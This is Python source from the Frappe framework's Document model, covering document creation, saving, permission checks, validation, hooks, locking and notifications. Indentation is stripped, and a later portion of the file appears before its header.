Note: If each hooked method returns a value (dict), then all returns are
collated in one dict and returned. Ideally, don't return values in hookable
methods, set properties in the document."""
def add_to_return_value(self, new_return_value):
if isinstance(new_return_value, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(new_return_value)
else:
self._return_value = new_return_value or self.get("_return_value")
def compose(fn, *hooks):
def runner(self, method, *args, **kwargs):
add_to_return_value(self, fn(self, *args, **kwargs))
for f in hooks:
add_to_return_value(self, f(self, method, *args, **kwargs))
return self._return_value
return runner
def composer(self, *args, **kwargs):
hooks = []
method = f.__name__
doc_events = frappe.get_doc_hooks()
for handler in doc_events.get(self.doctype, {}).get(method, []) \
+ doc_events.get("*", {}).get(method, []):
hooks.append(frappe.get_attr(handler))
composed = compose(f, *hooks)
return composed(self, method, *args, **kwargs)
return composer
def is_whitelisted(self, method):
fn = getattr(self, method, None)
if not fn:
raise NotFound("Method {0} not found".format(method))
elif not getattr(fn, "whitelisted", False):
raise Forbidden("Method {0} not whitelisted".format(method))
def validate_value(self, fieldname, condition, val2, doc=None, raise_exception=None):
"""Check that value of fieldname should be 'condition' val2
else throw Exception."""
error_condition_map = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not doc:
doc = self
val1 = doc.get_value(fieldname)
df = doc.meta.get_field(fieldname)
val2 = doc.cast(val2, df)
if not frappe.compare(val1, condition, val2):
label = doc.meta.get_label(fieldname)
condition_str = error_condition_map.get(condition, condition)
if doc.parentfield:
msg = _("Incorrect value in row {0}: {1} must be {2} {3}").format(doc.idx, label, condition_str, val2)
else:
msg = _("Incorrect value: {0} must be {1} {2}").format(label, condition_str, val2)
# raise passed exception or True
msgprint(msg, raise_exception=raise_exception or True)
def validate_table_has_rows(self, parentfield, raise_exception=None):
"""Raise exception if Table field is empty."""
if not (isinstance(self.get(parentfield), list) and len(self.get(parentfield)) > 0):
label = self.meta.get_label(parentfield)
frappe.throw(_("Table {0} cannot be empty").format(label), raise_exception or frappe.EmptyTableError)
def round_floats_in(self, doc, fieldnames=None):
"""Round floats for all `Currency`, `Float`, `Percent` fields for the given doc.
:param doc: Document whose numeric properties are to be rounded.
:param fieldnames: [Optional] List of fields to be rounded."""
if not fieldnames:
fieldnames = (df.fieldname for df in
doc.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for fieldname in fieldnames:
doc.set(fieldname, flt(doc.get(fieldname), self.precision(fieldname, doc.parentfield)))
def get_url(self):
"""Returns Desk URL for this document. `/app/Form/{doctype}/{name}`"""
return "/app/Form/{doctype}/{name}".format(doctype=self.doctype, name=self.name)
def add_comment(self, comment_type='Comment', text=None, comment_email=None, link_doctype=None, link_name=None, comment_by=None):
"""Add a comment to this document.
:param comment_type: e.g. `Comment`. See Communication for more info."""
out = frappe.get_doc({
"doctype":"Comment",
'comment_type': comment_type,
"comment_email": comment_email or frappe.session.user,
"comment_by": comment_by,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": text or comment_type,
"link_doctype": link_doctype,
"link_name": link_name
}).insert(ignore_permissions=True)
return out
def add_seen(self, user=None):
"""add the given/current user to list of users who have seen this document (_seen)"""
if not user:
user = frappe.session.user
if self.meta.track_seen:
_seen = self.get('_seen') or []
_seen = frappe.parse_json(_seen)
if user not in _seen:
_seen.append(user)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(_seen), update_modified=False)
frappe.local.flags.commit = True
def add_viewed(self, user=None):
"""add log to communication when a user views a document"""
if not user:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(ignore_permissions=True)
frappe.local.flags.commit = True
def get_signature(self):
"""Returns signature (hash) for private URL."""
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def get_liked_by(self):
liked_by = getattr(self, "_liked_by", None)
if liked_by:
return json.loads(liked_by)
else:
return []
def set_onload(self, key, value):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[key] = value
def get_onload(self, key=None):
if not key:
return self.get("__onload", frappe._dict())
return self.get('__onload')[key]
def queue_action(self, action, **kwargs):
"""Run an action in background. If the action has an inner function,
like _submit for submit, it will call that instead"""
# call _submit instead of submit, so you can override submit to call
# run_delayed based on some action
# See: Stock Reconciliation
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + action):
action = '_' + action
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', doctype=self.doctype, name=self.name,
action=action, **kwargs)
def lock(self, timeout=None):
"""Creates a lock file for the given document. If timeout is set,
it will retry every 1 second for acquiring the lock again
:param timeout: Timeout in seconds, default 0"""
signature = self.get_signature()
if file_lock.lock_exists(signature):
lock_exists = True
if timeout:
for i in range(timeout):
time.sleep(1)
if not file_lock.lock_exists(signature):
lock_exists = False
break
if lock_exists:
raise frappe.DocumentLockedError
file_lock.create_lock(signature)
def unlock(self):
"""Delete the lock file for this document"""
file_lock.delete_lock(self.get_signature())
# validation helpers
def validate_from_to_dates(self, from_date_field, to_date_field):
"""
Generic validation to verify date sequence
"""
if date_diff(self.get(to_date_field), self.get(from_date_field)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(to_date_field)),
frappe.bold(self.meta.get_label(from_date_field)),
), frappe.exceptions.InvalidDates)
def get_assigned_users(self):
assignments = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
users = set([assignment.owner for assignment in assignments])
return users
def add_tag(self, tag):
"""Add a Tag to this document"""
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, tag)
def get_tags(self):
"""Return a list of Tags attached to this document"""
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def execute_action(doctype, name, action, **kwargs):
"""Execute an action on a document (called by background worker)"""
doc = frappe.get_doc(doctype, name)
doc.unlock()
try:
getattr(doc, action)(**kwargs)
except Exception:
frappe.db.rollback()
# add a comment (?)
if frappe.local.message_log:
msg = json.loads(frappe.local.message_log[-1]).get('message')
else:
msg = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
doc.add_comment('Comment', _('Action Failed') + '<br><br>' + msg)
doc.notify_update()
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
import frappe
import time
from frappe import _, msgprint, is_whitelisted
from frappe.utils import flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, table_fields
from frappe.model.workflow import validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
# once_only validation
# methods
def get_doc(*args, **kwargs):
"""returns a frappe.model.Document object.
:param arg1: Document dict or DocType name.
:param arg2: [optional] document name.
:param for_update: [optional] select document for update.
There are multiple ways to call `get_doc`
# will fetch the latest user object (with child table) from the database
user = get_doc("User", "test@example.com")
# create a new object
user = get_doc({
"doctype":"User"
"email_id": "test@example.com",
"roles: [
{"role": "System Manager"}
]
})
# create new object with keyword arguments
user = get_doc(doctype='User', email_id='test@example.com')
# select a document for update
user = get_doc("User", "test@example.com", for_update=True)
"""
if args:
if isinstance(args[0], BaseDocument):
# already a document
return args[0]
elif isinstance(args[0], string_types):
doctype = args[0]
elif isinstance(args[0], dict):
# passed a dict
kwargs = args[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(args) < 2 and kwargs:
if 'doctype' in kwargs:
doctype = kwargs['doctype']
else:
raise ValueError('"doctype" is a required key')
controller = get_controller(doctype)
if controller:
return controller(*args, **kwargs)
raise ImportError(doctype)
class Document(BaseDocument):
"""All controllers inherit from `Document`."""
def __init__(self, *args, **kwargs):
"""Constructor.
:param arg1: DocType name as string or document **dict**
:param arg2: Document name, if `arg1` is DocType name.
If DocType name and document name are passed, the object will load
all values (including child documents) from the database.
"""
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if args and args[0] and isinstance(args[0], string_types):
# first arugment is doctype
if len(args)==1:
# single
self.doctype = self.name = args[0]
else:
self.doctype = args[0]
if isinstance(args[1], dict):
# filter
self.name = frappe.db.get_value(args[0], args[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(args[0]), args[1]),
frappe.DoesNotExistError)
else:
self.name = args[1]
if 'for_update' in kwargs:
self.flags.for_update = kwargs.get('for_update')
self.load_from_db()
return
if args and args[0] and isinstance(args[0], dict):
# first argument is a dict
kwargs = args[0]
if kwargs:
# init base document
super(Document, self).__init__(kwargs)
self.init_valid_columns()
else:
# incorrect arguments. let's not proceed.
raise ValueError('Illegal arguments')
@staticmethod
def whitelist(fn):
"""Decorator: Whitelist method to be called remotely via REST API."""
frappe.whitelist()(fn)
return fn
def reload(self):
"""Reload document from database"""
self.load_from_db()
def load_from_db(self):
"""Load document and children from database and create properties
from fields"""
if not getattr(self, "_metaclass", False) and self.meta.issingle:
single_doc = frappe.db.get_singles_dict(self.doctype)
if not single_doc:
single_doc = frappe.new_doc(self.doctype).as_dict()
single_doc["name"] = self.doctype
del single_doc["__islocal"]
super(Document, self).__init__(single_doc)
self.init_valid_columns()
self._fix_numeric_types()
else:
d = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not d:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(Document, self).__init__(d)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
table_fields = DOCTYPE_TABLE_FIELDS
else:
table_fields = self.meta.get_table_fields()
for df in table_fields:
children = frappe.db.get_values(df.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": df.fieldname},
"*", as_dict=True, order_by="idx asc")
if children:
self.set(df.fieldname, children)
else:
self.set(df.fieldname, [])
# sometimes __setup__ can depend on child values, hence calling again at the end
if hasattr(self, "__setup__"):
self.__setup__()
def get_latest(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def check_permission(self, permtype='read', permlevel=None):
"""Raise `frappe.PermissionError` if not permitted"""
if not self.has_permission(permtype):
self.raise_no_permission_to(permlevel or permtype)
def has_permission(self, permtype="read", verbose=False):
"""Call `frappe.has_permission` if `self.flags.ignore_permissions`
is not set.
:param permtype: one of `read`, `write`, `submit`, `cancel`, `delete`"""
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, permtype, self, verbose=verbose)
def raise_no_permission_to(self, perm_type):
"""Raise `frappe.PermissionError`."""
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def insert(self, ignore_permissions=None, ignore_links=None, ignore_if_duplicate=False,
ignore_mandatory=None, set_name=None, set_child_names=True):
"""Insert the document in the database (as a new document).
This will check for user permissions and execute `before_insert`,
`validate`, `on_update`, `after_insert` methods if they are written.
:param ignore_permissions: Do not check permissions if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
if ignore_links!=None:
self.flags.ignore_links = ignore_links
if ignore_mandatory!=None:
self.flags.ignore_mandatory = ignore_mandatory
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(set_name=set_name, set_child_names=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
# run validate, on update etc.
# parent
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not ignore_if_duplicate:
raise e
# children
for d in self.get_all_children():
d.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
# flag to prevent creation of event update log for create and update both
# during document creation
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
# delete __islocal
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def save(self, *args, **kwargs):
"""Wrapper for _save"""
return self._save(*args, **kwargs)
def _save(self, ignore_permissions=None, ignore_version=None):
"""Save the current document in the database in the **DocType**'s table or
`tabSingles` (for single types).
This will check for user permissions and execute
`validate` before updating, `on_update` after updating triggers.
:param ignore_permissions: Do not check permissions if True.
:param ignore_version: Do not save version if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
self.flags.ignore_version = frappe.flags.in_test if ignore_version is None else ignore_version
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
# parent
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def copy_attachments_from_amended_from(self):
"""Copy attachments from `amended_from`"""
from frappe.desk.form.load import get_attachments
#loop through attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
#save attachments to new doc
_file = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
_file.save()
def update_children(self):
"""update child tables"""
for df in self.meta.get_table_fields():
self.update_child_table(df.fieldname, df)
def update_child_table(self, fieldname, df=None):
"""sync child table for given fieldname"""
rows = []
if not df:
df = self.meta.get_field(fieldname)
for d in self.get(df.fieldname):
d.db_update()
rows.append(d.name)
if df.options in (self.flags.ignore_children_type or []):
# do not delete rows for this because of flags
# hack for docperm :(
return
if rows:
# select rows that do not match the ones in the document
deleted_rows = frappe.db.sql("""select name from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s
and name not in ({1})""".format(df.options, ','.join(['%s'] * len(rows))),
[self.name, self.doctype, fieldname] + rows)
if len(deleted_rows) > 0:
# delete rows that do not match the ones in the document
frappe.db.sql("""delete from `tab{0}` where name in ({1})""".format(df.options,
','.join(['%s'] * len(deleted_rows))), tuple(row[0] for row in deleted_rows))
else:
# no rows found, delete all rows
frappe.db.sql("""delete from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s""".format(df.options),
(self.name, self.doctype, fieldname))
def get_doc_before_save(self):
return getattr(self, '_doc_before_save', None)
def has_value_changed(self, fieldname):
'''Returns true if value is changed before and after saving'''
previous = self.get_doc_before_save()
return previous.get(fieldname)!=self.get(fieldname) if previous else True
def set_new_name(self, force=False, set_name=None, set_child_names=True):
"""Calls `frappe.naming.set_new_name` for parent and child docs."""
if self.flags.name_set and not force:
return
# If autoname has set as Prompt (name)
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if set_name:
self.name = set_name
else:
set_new_name(self)
if set_child_names:
# set name for children
for d in self.get_all_children():
set_new_name(d)
self.flags.name_set = True
def get_title(self):
"""Get the document title based on title_field or `title` or `name`"""
return self.get(self.meta.get_title_field())
def set_title_field(self):
"""Set title field based on template"""
def get_values():
values = self.as_dict()
# format values
for key, value in iteritems(values):
if value==None:
values[key] = ""
return values
if self.meta.get("title_field")=="title":
df = self.meta.get_field(self.meta.title_field)
if df.options:
self.set(df.fieldname, df.options.format(**get_values()))
elif self.is_new() and not self.get(df.fieldname) and df.default:
# set default title for new transactions (if default)
self.set(df.fieldname, df.default.format(**get_values()))
def update_single(self, d):
"""Updates values for Single type Document in `tabSingles`."""
frappe.db.sql("""delete from `tabSingles` where doctype=%s""", self.doctype)
for field, value in iteritems(d):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (doctype, field, value)
values (%s, %s, %s)""", (self.doctype, field, value))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def set_user_and_timestamp(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for d in self.get_all_children():
d.modified = self.modified
d.modified_by = self.modified_by
if not d.owner:
d.owner = self.owner
if not d.creation:
d.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def set_docstatus(self):
if self.docstatus==None:
self.docstatus=0
for d in self.get_all_children():
d.docstatus = self.docstatus
def _validate(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
children = self.get_all_children()
for d in children:
d._validate_data_fields()
d._validate_selects()
d._validate_non_negative()
d._validate_length()
d._extract_images_from_text_editor()
d._sanitize_content()
d._save_passwords()
if self.is_new():
# don't set fields like _assign, _comments for new doc
for fieldname in optional_fields:
self.set(fieldname, None)
else:
self.validate_set_only_once()
def _validate_non_negative(self):
def get_msg(df):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(df.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(df.parent), frappe.bold(_(df.label)))
for df in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(df.fieldname)) < 0:
msg = get_msg(df)
frappe.throw(msg, frappe.NonNegativeError, title=_("Negative Value"))
def validate_workflow(self):
"""Validate if the workflow transition is valid"""
if frappe.flags.in_install == 'frappe': return
workflow = self.meta.get_workflow()
if workflow:
validate_workflow(self)
if not self._action == 'save':
set_workflow_state_on_action(self, workflow, self._action)
def validate_set_only_once(self):
"""Validate that fields are not changed if not in insert"""
set_only_once_fields = self.meta.get_set_only_once_fields()
if set_only_once_fields and self._doc_before_save:
# document exists before saving
for field in set_only_once_fields:
fail = False
value = self.get(field.fieldname)
original_value = self._doc_before_save.get(field.fieldname)
if field.fieldtype in table_fields:
fail = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
fail = str(value) != str(original_value)
else:
fail = value != original_value
if fail:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def is_child_table_same(self, fieldname):
"""Validate child table is same as original table before saving"""
value = self.get(fieldname)
original_value = self._doc_before_save.get(fieldname)
same = True
if len(original_value) != len(value):
same = False
else:
# check all child entries
for i, d in enumerate(original_value):
new_child = value[i].as_dict(convert_dates_to_str = True)
original_child = d.as_dict(convert_dates_to_str = True)
# all fields must be same other than modified and modified_by
for key in ('modified', 'modified_by', 'creation'):
del new_child[key]
del original_child[key]
if original_child != new_child:
same = False
break
return same
def apply_fieldlevel_read_permissions(self):
"""Remove values the user is not allowed to read (called when loading in desk)"""
if frappe.session.user == "Administrator":
return
has_higher_permlevel = False
all_fields = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
all_fields += frappe.get_meta(table_field.options).fields or []
for df in all_fields:
if df.permlevel > 0:
has_higher_permlevel = True
break
if not has_higher_permlevel:
return
has_access_to = self.get_permlevel_access('read')
for df in self.meta.fields:
if df.permlevel and not df.permlevel in has_access_to:
self.set(df.fieldname, None)
for table_field in self.meta.get_table_fields():
for df in frappe.get_meta(table_field.options).fields or []:
if df.permlevel and not df.permlevel in has_access_to:
for child in self.get(table_field.fieldname) or []:
child.set(df.fieldname, None)
def validate_higher_perm_levels(self):
"""If the user does not have permissions at permlevel > 0, then reset the values to original / default"""
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
has_access_to = self.get_permlevel_access()
high_permlevel_fields = self.meta.get_high_permlevel_fields()
if high_permlevel_fields:
self.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
# If new record then don't reset the values for child table
if self.is_new(): return
# check for child tables
for df in self.meta.get_table_fields():
high_permlevel_fields = frappe.get_meta(df.options).get_high_permlevel_fields()
if high_permlevel_fields:
for d in self.get(df.fieldname):
d.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
def get_permlevel_access(self, permission_type='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[permission_type] = []
roles = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in roles and perm.get(permission_type):
if perm.permlevel not in self._has_access_to[permission_type]:
self._has_access_to[permission_type].append(perm.permlevel)
return self._has_access_to[permission_type]
def has_permlevel_access_to(self, fieldname, df=None, permission_type='read'):
if not df:
df = self.meta.get_field(fieldname)
return df.permlevel in self.get_permlevel_access(permission_type)
def get_permissions(self):
if self.meta.istable:
# use parent permissions
permissions = frappe.get_meta(self.parenttype).permissions
else:
permissions = self.meta.permissions
return permissions
def _set_defaults(self):
if frappe.flags.in_import:
return
new_doc = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(new_doc)
# children
for df in self.meta.get_table_fields():
new_doc = frappe.new_doc(df.options, as_dict=True)
value = self.get(df.fieldname)
if isinstance(value, list):
for d in value:
d.update_if_missing(new_doc)
def check_if_latest(self):
"""Checks if `modified` timestamp provided by document being updated is same as the
`modified` timestamp in the database. If there is a different, the document has been
updated in the database after the current copy was read. Will throw an error if
timestamps don't match.
Will also validate document transitions (Save > Submit > Cancel) calling
`self.check_docstatus_transition`."""
conflict = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
modified = frappe.db.sql("""select value from tabSingles
where doctype=%s and field='modified' for update""", self.doctype)
modified = modified and modified[0][0]
if modified and modified != cstr(self._original_modified):
conflict = True
else:
tmp = frappe.db.sql("""select modified, docstatus from `tab{0}`
where name = %s for update""".format(self.doctype), self.name, as_dict=True)
if not tmp:
frappe.throw(_("Record does not exist"))
else:
tmp = tmp[0]
modified = cstr(tmp.modified)
if modified and modified != cstr(self._original_modified):
conflict = True
self.check_docstatus_transition(tmp.docstatus)
if conflict:
frappe.msgprint(_("Error: Document has been modified after you have opened it") \
+ (" (%s, %s). " % (modified, self.modified)) \
+ _("Please refresh to get the latest document."),
raise_exception=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def check_docstatus_transition(self, docstatus):
"""Ensures valid `docstatus` transition.
Valid transitions are (number in brackets is `docstatus`):
- Save (0) > Save (0)
- Save (0) > Submit (1)
- Submit (1) > Submit (1)
- Submit (1) > Cancel (2)
"""
if not self.docstatus:
self.docstatus = 0
if docstatus==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 0 to 2"))
elif docstatus==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 1 to 0"))
elif docstatus==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def set_parent_in_children(self):
"""Updates `parent` and `parenttype` property in all children."""
for d in self.get_all_children():
d.parent = self.name
d.parenttype = self.doctype
def set_name_in_children(self):
# Set name for any new children
for d in self.get_all_children():
if not d.name:
set_new_name(d)
def validate_update_after_submit(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for d in self.get_all_children():
if d.is_new() and self.meta.get_field(d.parentfield).allow_on_submit:
# in case of a new row, don't validate allow on submit, if table is allow on submit
continue
d._validate_update_after_submit()
# TODO check only allowed values are updated
def _validate_mandatory(self):
if self.flags.ignore_mandatory:
return
missing = self._get_missing_mandatory_fields()
for d in self.get_all_children():
missing.extend(d._get_missing_mandatory_fields())
if not missing:
return
for fieldname, msg in missing:
msgprint(msg)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{doctype}, {name}]: {fields}'.format(
fields=", ".join((each[0] for each in missing)),
doctype=self.doctype,
name=self.name))
def _validate_links(self):
if self.flags.ignore_links or self._action == "cancel":
return
invalid_links, cancelled_links = self.get_invalid_links()
for d in self.get_all_children():
result = d.get_invalid_links(is_submittable=self.meta.is_submittable)
invalid_links.extend(result[0])
cancelled_links.extend(result[1])
if invalid_links:
msg = ", ".join((each[2] for each in invalid_links))
frappe.throw(_("Could not find {0}").format(msg),
frappe.LinkValidationError)
if cancelled_links:
msg = ", ".join((each[2] for each in cancelled_links))
frappe.throw(_("Cannot link cancelled document: {0}").format(msg),
frappe.CancelledLinkError)
def get_all_children(self, parenttype=None):
"""Returns all children documents from **Table** type field in a list."""
ret = []
for df in self.meta.get("fields", {"fieldtype": ['in', table_fields]}):
if parenttype:
if df.options==parenttype:
return self.get(df.fieldname)
value = self.get(df.fieldname)
if isinstance(value, list):
ret.extend(value)
return ret
def run_method(self, method, *args, **kwargs):
"""run standard triggers, plus those in hooks"""
if "flags" in kwargs:
del kwargs["flags"]
if hasattr(self, method) and hasattr(getattr(self, method), "__call__"):
fn = lambda self, *args, **kwargs: getattr(self, method)(*args, **kwargs)
else:
# hack! to run hooks even if method does not exist
fn = lambda self, *args, **kwargs: None
fn.__name__ = str(method)
out = Document.hook(fn)(self, *args, **kwargs)
self.run_notifications(method)
run_webhooks(self, method)
run_server_script_for_doc_event(self, method)
return out
def run_trigger(self, method, *args, **kwargs):
return self.run_method(method, *args, **kwargs)
def run_notifications(self, method):
"""Run notifications for this method"""
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
alerts = frappe.cache().hget('notifications', self.doctype)
if alerts==None:
alerts = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, alerts)
self.flags.notifications = alerts
if not self.flags.notifications:
return
def _evaluate_alert(alert):
if not alert.name in self.flags.notifications_executed:
evaluate_alert(self, alert.name, alert.event)
self.flags.notifications_executed.append(alert.name)
event_map = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
# value change is not applicable in insert
event_map['on_change'] = 'Value Change'
for alert in self.flags.notifications:
event = event_map.get(method, None)
if event and alert.event == event:
_evaluate_alert(alert)
elif alert.event=='Method' and method == alert.method:
_evaluate_alert(alert)
@whitelist.__func__
def _submit(self):
"""Submit the document. Sets `docstatus` = 1, then saves."""
self.docstatus = 1
self.save()
@whitelist.__func__
def _cancel(self):
"""Cancel the document. Sets `docstatus` = 2, then saves."""
self.docstatus = 2
self.save()
@whitelist.__func__
def submit(self):
"""Submit the document. Sets `docstatus` = 1, then saves."""
self._submit()
@whitelist.__func__
def cancel(self):
"""Cancel the document. Sets `docstatus` = 2, then saves."""
self._cancel()
def delete(self, ignore_permissions=False):
"""Delete document."""
frappe.delete_doc(self.doctype, self.name, ignore_permissions = ignore_permissions, flags=self.flags)
def run_before_save_methods(self):
"""Run standard methods before `INSERT` or `UPDATE`. Standard Methods are:
- `validate`, `before_save` for **Save**.
- `validate`, `before_submit` for **Submit**.
- `before_cancel` for **Cancel**
- `before_update_after_submit` for **Update after Submit**
Will also update title_field if set"""
self.load_doc_before_save()
self.reset_seen()
# before_validate method should be executed before ignoring validations
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def load_doc_before_save(self):
"""Save load document from db before saving"""
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def run_post_save_methods(self):
"""Run standard methods after `INSERT` or `UPDATE`. Standard Methods are:
- `on_update` for **Save**.
- `on_update`, `on_submit` for **Submit**.
- `on_cancel` for **Cancel**
- `update_after_submit` for **Update after Submit**"""
doc_before_save = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def clear_cache(self):
frappe.clear_document_cache(self.doctype, self.name)
def reset_seen(self):
"""Clear _seen property and set current user as seen"""
